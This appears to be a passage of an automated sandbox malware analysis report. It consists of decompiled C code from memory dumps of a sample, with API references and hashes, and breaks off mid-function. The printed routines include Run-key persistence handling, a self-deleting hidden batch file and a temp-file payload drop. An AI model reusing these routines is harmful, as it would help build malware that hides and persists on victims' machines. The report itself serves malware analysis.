                                                                                                                                                                                                                                                                          						RegCloseKey(_v20);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}























                                                                                                                                                                                                                                                                          0x04007256
                                                                                                                                                                                                                                                                          0x0400725e
                                                                                                                                                                                                                                                                          0x040073af
                                                                                                                                                                                                                                                                          0x040073b5
                                                                                                                                                                                                                                                                          0x04007285
                                                                                                                                                                                                                                                                          0x04007295
                                                                                                                                                                                                                                                                          0x04007298
                                                                                                                                                                                                                                                                          0x0400729d
                                                                                                                                                                                                                                                                          0x040072a8
                                                                                                                                                                                                                                                                          0x040072bd
                                                                                                                                                                                                                                                                          0x040072c3
                                                                                                                                                                                                                                                                          0x040072c6
                                                                                                                                                                                                                                                                          0x040072d6
                                                                                                                                                                                                                                                                          0x040072d8
                                                                                                                                                                                                                                                                          0x040072d8
                                                                                                                                                                                                                                                                          0x040072df
                                                                                                                                                                                                                                                                          0x04007301
                                                                                                                                                                                                                                                                          0x04007307
                                                                                                                                                                                                                                                                          0x0400730e
                                                                                                                                                                                                                                                                          0x04007331
                                                                                                                                                                                                                                                                          0x0400733c
                                                                                                                                                                                                                                                                          0x04007343
                                                                                                                                                                                                                                                                          0x04007349
                                                                                                                                                                                                                                                                          0x0400734c
                                                                                                                                                                                                                                                                          0x0400734f
                                                                                                                                                                                                                                                                          0x04007353
                                                                                                                                                                                                                                                                          0x04007358
                                                                                                                                                                                                                                                                          0x0400735e
                                                                                                                                                                                                                                                                          0x04007364
                                                                                                                                                                                                                                                                          0x0400736a
                                                                                                                                                                                                                                                                          0x0400736f
                                                                                                                                                                                                                                                                          0x04007374
                                                                                                                                                                                                                                                                          0x0400737a
                                                                                                                                                                                                                                                                          0x04007380
                                                                                                                                                                                                                                                                          0x04007383
                                                                                                                                                                                                                                                                          0x0400738b
                                                                                                                                                                                                                                                                          0x04007393
                                                                                                                                                                                                                                                                          0x0400739f
                                                                                                                                                                                                                                                                          0x040073a1
                                                                                                                                                                                                                                                                          0x040073a1
                                                                                                                                                                                                                                                                          0x0400739f
                                                                                                                                                                                                                                                                          0x040073a9
                                                                                                                                                                                                                                                                          0x040073a9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007301

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 040072BD
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 040072F9
                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 04007329
                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 04007343
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 040073A9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenQueryTimeValuewsprintf
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3852505512-0
                                                                                                                                                                                                                                                                          • Opcode ID: dbb66ec4e40f0b96ddf8d886ab6d66ea576557e999e4472c56c1706dad51e441
                                                                                                                                                                                                                                                                          • Instruction ID: 1589668eb117d9c12aae7036857c9bc1fd79cd220dc98d09134ced9bc9b72130
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbb66ec4e40f0b96ddf8d886ab6d66ea576557e999e4472c56c1706dad51e441
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE414C74900208EFEB08DF94D885BEDBBB5FF48300F14C569E915AB281D779AA45CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E0040140E(signed int __eax) {
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				signed int _t10;
                                                                                                                                                                                                                                                                          				intOrPtr* _t15;
                                                                                                                                                                                                                                                                          				intOrPtr* _t16;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                                                                          				 *_t15 = 0;
                                                                                                                                                                                                                                                                          				L00401C0C();
                                                                                                                                                                                                                                                                          				_t16 = _t15 - 0xc;
                                                                                                                                                                                                                                                                          				_t10 = __eax & 0xffffff00 | __eax == 0x00000000;
                                                                                                                                                                                                                                                                          				if(_t10 == 0) {
                                                                                                                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                                                                                                                          					_v36 = 0;
                                                                                                                                                                                                                                                                          					 *_t16 = 0;
                                                                                                                                                                                                                                                                          					L00401C0C();
                                                                                                                                                                                                                                                                          					if((_t10 & 0xffffff00 | _t10 == 0x00000000) == 0) {
                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                          0x00401414
                                                                                                                                                                                                                                                                          0x0040141c
                                                                                                                                                                                                                                                                          0x00401424
                                                                                                                                                                                                                                                                          0x0040142b
                                                                                                                                                                                                                                                                          0x00401430
                                                                                                                                                                                                                                                                          0x00401435
                                                                                                                                                                                                                                                                          0x0040143a
                                                                                                                                                                                                                                                                          0x00401443
                                                                                                                                                                                                                                                                          0x0040144b
                                                                                                                                                                                                                                                                          0x00401453
                                                                                                                                                                                                                                                                          0x0040145a
                                                                                                                                                                                                                                                                          0x00401469
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401472
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0040146b
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ZwOpenSymbolicLinkObject.NTDLL ref: 0040142B
                                                                                                                                                                                                                                                                          • ZwOpenSymbolicLinkObject.NTDLL ref: 0040145A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.558886062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558685401.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558979025.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559069325.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559239825.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559886186.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LinkObjectOpenSymbolic
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3706036087-0
                                                                                                                                                                                                                                                                          • Opcode ID: cd286264bccb84c5051e0243f65d90162e84a5efa82d2a79a07f8584eeb8a4d4
                                                                                                                                                                                                                                                                          • Instruction ID: b50a674320e6d0b66e8d5d3e8987e5ca71188859bf5b90f6f4bd054444dac5c5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd286264bccb84c5051e0243f65d90162e84a5efa82d2a79a07f8584eeb8a4d4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96F0C9A010D30056E7007F65D20975B7BE4AB41389F40456DE8C4AB6F5D7BDC449878B
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.571769846.0000000002370000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2370000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: fda46960d40e5069d9d85ddddae04929f816436dd0746330b63fa234edf94fde
                                                                                                                                                                                                                                                                          • Instruction ID: 205eced71d1a3dbd413b2dbafc9c084cdb363b471496ab5299b75926759eeb29
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fda46960d40e5069d9d85ddddae04929f816436dd0746330b63fa234edf94fde
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F315E75A087568FDBA4DF18C8C092AB7E4FF89314F0545A9E9808B312E734E945CBD2
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                                                                          			E04003090() {
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				asm("lodsd");
                                                                                                                                                                                                                                                                          				return  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 8));
                                                                                                                                                                                                                                                                          			}



                                                                                                                                                                                                                                                                          0x0400309f
                                                                                                                                                                                                                                                                          0x040030a4

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                                                                                                          • Instruction ID: 88215b3929851b503fb9e0336a359976704c6dde636ba1c8479b7b66991880c0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25C04C36221850CFC781CF18E444E81B3E4FB09631B068491E805DB721D234EC41CA40
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                                                                                          			E040074A0() {
                                                                                                                                                                                                                                                                          				char _v524;
                                                                                                                                                                                                                                                                          				CHAR* _v528;
                                                                                                                                                                                                                                                                          				void* _v532;
                                                                                                                                                                                                                                                                          				void* _v536;
                                                                                                                                                                                                                                                                          				void* _v540;
                                                                                                                                                                                                                                                                          				char _v1060;
                                                                                                                                                                                                                                                                          				char _v1580;
                                                                                                                                                                                                                                                                          				char _v2364;
                                                                                                                                                                                                                                                                          				long _v2368;
                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v2384;
                                                                                                                                                                                                                                                                          				long _v2388;
                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v2460;
                                                                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                                                                          				void* _t121;
                                                                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                                                                          				void* _t124;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				E04007D20(E04007D20( &_v2364,  &_v2364, 0, 0x30c),  &_v1060, 0, 0x208);
                                                                                                                                                                                                                                                                          				_t123 = _t121 + 0x18;
                                                                                                                                                                                                                                                                          				 *0x4014370 = 1;
                                                                                                                                                                                                                                                                          				Sleep(0x3e8);
                                                                                                                                                                                                                                                                          				if(( *0x4014362 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					_v2368 = 0x207;
                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						GetEnvironmentVariableA("USERPROFILE",  &_v1060, 0x207);
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						__imp__GetAllUsersProfileDirectoryA( &_v1060,  &_v2368);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					lstrcatA( &_v1060, "\\");
                                                                                                                                                                                                                                                                          					lstrcatA( &_v1060, "pigalicapi");
                                                                                                                                                                                                                                                                          					lstrcatA( &_v1060, ".exe");
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					GetModuleFileNameA(0,  &_v1060, 0x207);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				SetFileAttributesA( &_v1060, 0x80);
                                                                                                                                                                                                                                                                          				wnsprintfA( &_v2364, 0x30b, ":repeat\r\ndel %s\r\nif exist %s goto :repeat\r\ndel %%0",  &_v1060,  &_v1060);
                                                                                                                                                                                                                                                                          				_t124 = _t123 + 0x14;
                                                                                                                                                                                                                                                                          				if( *0x401436c != 0) {
                                                                                                                                                                                                                                                                          					_t86 =  *0x401436c; // 0x258
                                                                                                                                                                                                                                                                          					TerminateThread(_t86, 1);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v528 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                          				_v532 = 0x80000001;
                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					_v532 = 0x80000002;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v536 = 0;
                                                                                                                                                                                                                                                                          				if(RegOpenKeyExA(_v532, _v528, 0, 2,  &_v536) == 0) {
                                                                                                                                                                                                                                                                          					RegDeleteValueA(_v536, "pigalicapi");
                                                                                                                                                                                                                                                                          					RegCloseKey(_v536);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if(( *0x401435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					E04005E30(1);
                                                                                                                                                                                                                                                                          					_t124 = _t124 + 4;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				GetEnvironmentVariableA("TEMP",  &_v1580, 0x104);
                                                                                                                                                                                                                                                                          				GetTempFileNameA( &_v1580, "slf", GetTickCount() % 0xffff,  &_v524);
                                                                                                                                                                                                                                                                          				lstrcatA( &_v524, ".bat");
                                                                                                                                                                                                                                                                          				_t71 = CreateFileA( &_v524, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                          				_v540 = _t71;
                                                                                                                                                                                                                                                                          				if(_v540 != 0xffffffff) {
                                                                                                                                                                                                                                                                          					_v2388 = 0;
                                                                                                                                                                                                                                                                          					WriteFile(_v540,  &_v2364, lstrlenA( &_v2364),  &_v2388, 0);
                                                                                                                                                                                                                                                                          					E04007D20(E04007D20(CloseHandle(_v540),  &_v2384, 0, 0x10),  &_v2460, 0, 0x44);
                                                                                                                                                                                                                                                                          					_v2460.cb = 0x44;
                                                                                                                                                                                                                                                                          					_v2460.dwFlags = _v2460.dwFlags | 0x00000001;
                                                                                                                                                                                                                                                                          					_v2460.wShowWindow = 0;
                                                                                                                                                                                                                                                                          					if(CreateProcessA(0,  &_v524, 0, 0, 0, 0, 0, 0,  &_v2460,  &_v2384) != 0) {
                                                                                                                                                                                                                                                                          						_t71 = CloseHandle(_v2384.hThread);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					ExitProcess(0);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _t71;
                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                          0x040074cd
                                                                                                                                                                                                                                                                          0x040074d2
                                                                                                                                                                                                                                                                          0x040074d5
                                                                                                                                                                                                                                                                          0x040074e4
                                                                                                                                                                                                                                                                          0x040074f3
                                                                                                                                                                                                                                                                          0x0400750b
                                                                                                                                                                                                                                                                          0x0400751e
                                                                                                                                                                                                                                                                          0x04007547
                                                                                                                                                                                                                                                                          0x04007520
                                                                                                                                                                                                                                                                          0x0400752e
                                                                                                                                                                                                                                                                          0x0400752e
                                                                                                                                                                                                                                                                          0x04007559
                                                                                                                                                                                                                                                                          0x0400756b
                                                                                                                                                                                                                                                                          0x0400757d
                                                                                                                                                                                                                                                                          0x040074f5
                                                                                                                                                                                                                                                                          0x04007503
                                                                                                                                                                                                                                                                          0x04007503
                                                                                                                                                                                                                                                                          0x0400758f
                                                                                                                                                                                                                                                                          0x040075b4
                                                                                                                                                                                                                                                                          0x040075ba
                                                                                                                                                                                                                                                                          0x040075c4
                                                                                                                                                                                                                                                                          0x040075c8
                                                                                                                                                                                                                                                                          0x040075ce
                                                                                                                                                                                                                                                                          0x040075ce
                                                                                                                                                                                                                                                                          0x040075d4
                                                                                                                                                                                                                                                                          0x040075de
                                                                                                                                                                                                                                                                          0x040075f1
                                                                                                                                                                                                                                                                          0x040075f3
                                                                                                                                                                                                                                                                          0x040075f3
                                                                                                                                                                                                                                                                          0x040075fd
                                                                                                                                                                                                                                                                          0x04007628
                                                                                                                                                                                                                                                                          0x04007636
                                                                                                                                                                                                                                                                          0x04007643
                                                                                                                                                                                                                                                                          0x04007643
                                                                                                                                                                                                                                                                          0x04007652
                                                                                                                                                                                                                                                                          0x04007656
                                                                                                                                                                                                                                                                          0x0400765b
                                                                                                                                                                                                                                                                          0x0400765b
                                                                                                                                                                                                                                                                          0x0400766f
                                                                                                                                                                                                                                                                          0x04007698
                                                                                                                                                                                                                                                                          0x040076aa
                                                                                                                                                                                                                                                                          0x040076c6
                                                                                                                                                                                                                                                                          0x040076cc
                                                                                                                                                                                                                                                                          0x040076d9
                                                                                                                                                                                                                                                                          0x040076df
                                                                                                                                                                                                                                                                          0x0400770e
                                                                                                                                                                                                                                                                          0x0400773f
                                                                                                                                                                                                                                                                          0x04007747
                                                                                                                                                                                                                                                                          0x0400775a
                                                                                                                                                                                                                                                                          0x04007762
                                                                                                                                                                                                                                                                          0x04007794
                                                                                                                                                                                                                                                                          0x0400779d
                                                                                                                                                                                                                                                                          0x0400779d
                                                                                                                                                                                                                                                                          0x040077a5
                                                                                                                                                                                                                                                                          0x040077a5
                                                                                                                                                                                                                                                                          0x040077ae

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 040074E4
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 04007503
                                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 0400752E
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0400C650), ref: 04007559
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,pigalicapi), ref: 0400756B
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.exe), ref: 0400757D
                                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 0400758F
                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 040075B4
                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000258,00000001), ref: 040075CE
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,0400C690,00000000,00000002,00000000), ref: 04007620
                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,pigalicapi), ref: 04007636
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04007643
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 0400766F
                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0400767C
                                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,slf,00000000), ref: 04007698
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.bat), ref: 040076AA
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 040076C6
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000000), ref: 040076F9
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,00000000), ref: 0400770E
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0400771B
                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0400778C
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0400779D
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 040077A5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteDirectoryEnvironmentExitModuleOpenProfileSleepTempTerminateThreadTickUsersValueVariableWritelstrlenwnsprintf
                                                                                                                                                                                                                                                                          • String ID: .bat$.exe$:repeatdel %sif exist %s goto :repeatdel %%0$D$TEMP$USERPROFILE$pigalicapi$slf
                                                                                                                                                                                                                                                                          • API String ID: 3221898725-336785456
                                                                                                                                                                                                                                                                          • Opcode ID: fa5edaca191c21db1bfd21e4a2ba9e4dafc3ba9ee2ebd150ac9fab347fea4d6a
                                                                                                                                                                                                                                                                          • Instruction ID: 33d1a80e31bd16fda39fb1d5e61c33b6d2d8e7faa3bd40571536c86a9d597677
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa5edaca191c21db1bfd21e4a2ba9e4dafc3ba9ee2ebd150ac9fab347fea4d6a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 277134B1A44318ABF7649F60DC49FEA7778EB44705F448698B209B60C1DBBCAA84CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                          			E04006DA0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                          				intOrPtr* _v8;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v40;
                                                                                                                                                                                                                                                                          				long _v44;
                                                                                                                                                                                                                                                                          				void* _v48;
                                                                                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                                                                                          				void* _v56;
                                                                                                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                                                                                                          				void* _v328;
                                                                                                                                                                                                                                                                          				char _v340;
                                                                                                                                                                                                                                                                          				char _v604;
                                                                                                                                                                                                                                                                          				long _v608;
                                                                                                                                                                                                                                                                          				int _v612;
                                                                                                                                                                                                                                                                          				long _v616;
                                                                                                                                                                                                                                                                          				void* _v620;
                                                                                                                                                                                                                                                                          				long _v624;
                                                                                                                                                                                                                                                                          				intOrPtr _v628;
                                                                                                                                                                                                                                                                          				void* _v632;
                                                                                                                                                                                                                                                                          				intOrPtr _t198;
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t217;
                                                                                                                                                                                                                                                                          				void* _t223;
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t248;
                                                                                                                                                                                                                                                                          				void* _t347;
                                                                                                                                                                                                                                                                          				void* _t349;
                                                                                                                                                                                                                                                                          				void* _t350;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                          				if(_v8 == 0) {
                                                                                                                                                                                                                                                                          					L39:
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				Sleep( *(_v8 + 0x14) * 0x3c * 0x3e8);
                                                                                                                                                                                                                                                                          				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                          				_v32 =  *_v8;
                                                                                                                                                                                                                                                                          				_v28 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                                                                                                                                          				_v24 =  *((intOrPtr*)(_v8 + 8));
                                                                                                                                                                                                                                                                          				_v12 =  *(_v8 + 0x14);
                                                                                                                                                                                                                                                                          				_v20 =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                          				_v16 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                                                                                                                          				if(( *(_v8 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                          					GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                          					E04007D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                          					E04009730( &_v340, 4);
                                                                                                                                                                                                                                                                          					_t349 = _t347 + 0x14;
                                                                                                                                                                                                                                                                          					GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                          					_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                          					if(_v328 != 0xffffffff) {
                                                                                                                                                                                                                                                                          						_v608 = 0;
                                                                                                                                                                                                                                                                          						_v612 = 0;
                                                                                                                                                                                                                                                                          						_v616 =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                          						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          							_v612 = WriteFile(_v328,  *(_v8 + 0x18),  *(_v8 + 0x1c),  &_v608, 0);
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v624 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                          							_v620 = VirtualAlloc(0, _v624, 0x3000, 4);
                                                                                                                                                                                                                                                                          							if(_v620 != 0) {
                                                                                                                                                                                                                                                                          								if(E04006260(_v8,  *(_v8 + 0x18),  *(_v8 + 0x1c), _v620, _v624) == _v624) {
                                                                                                                                                                                                                                                                          									_v612 = WriteFile(_v328, _v620, _v624,  &_v608, 0);
                                                                                                                                                                                                                                                                          									_v616 = _v624;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								VirtualFree(_v620, 0, 0x8000);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CloseHandle(_v328);
                                                                                                                                                                                                                                                                          						if(_v612 != 0 && _v608 == _v616) {
                                                                                                                                                                                                                                                                          							_t198 = E04001E60( &_v324);
                                                                                                                                                                                                                                                                          							_t350 = _t349 + 4;
